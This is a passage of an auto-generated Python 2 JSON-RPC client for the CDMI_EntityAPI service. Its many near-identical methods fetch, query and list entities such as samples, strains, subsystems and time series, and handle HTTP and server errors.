raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_SSRow(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_SSRow',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_SSRow(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_SSRow',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Sample(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Sample',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Sample(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Sample',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Sample(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Sample',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_SampleAnnotation(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_SampleAnnotation',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_SampleAnnotation(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_SampleAnnotation',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_SampleAnnotation(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_SampleAnnotation',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Scenario(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Scenario',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Scenario(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Scenario',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Scenario(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Scenario',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Series(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Series',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Series(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Series',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Series(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Series',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Source(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Source',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Source(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Source',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Source(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Source',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Strain(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Strain',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Strain(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Strain',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Strain(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Strain',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_StudyExperiment(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_StudyExperiment',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_StudyExperiment(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_StudyExperiment',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_StudyExperiment(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_StudyExperiment',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Subsystem(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Subsystem',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Subsystem(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Subsystem',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Subsystem(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Subsystem',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_SubsystemClass(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_SubsystemClass',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_SubsystemClass(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_SubsystemClass',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_SubsystemClass(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_SubsystemClass',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_TaxonomicGrouping(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_TaxonomicGrouping',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_TaxonomicGrouping(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_TaxonomicGrouping',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_TaxonomicGrouping(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_TaxonomicGrouping',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_TimeSeries(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_TimeSeries',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_TimeSeries(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_TimeSeries',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_TimeSeries(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_TimeSeries',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Trait(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Trait',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
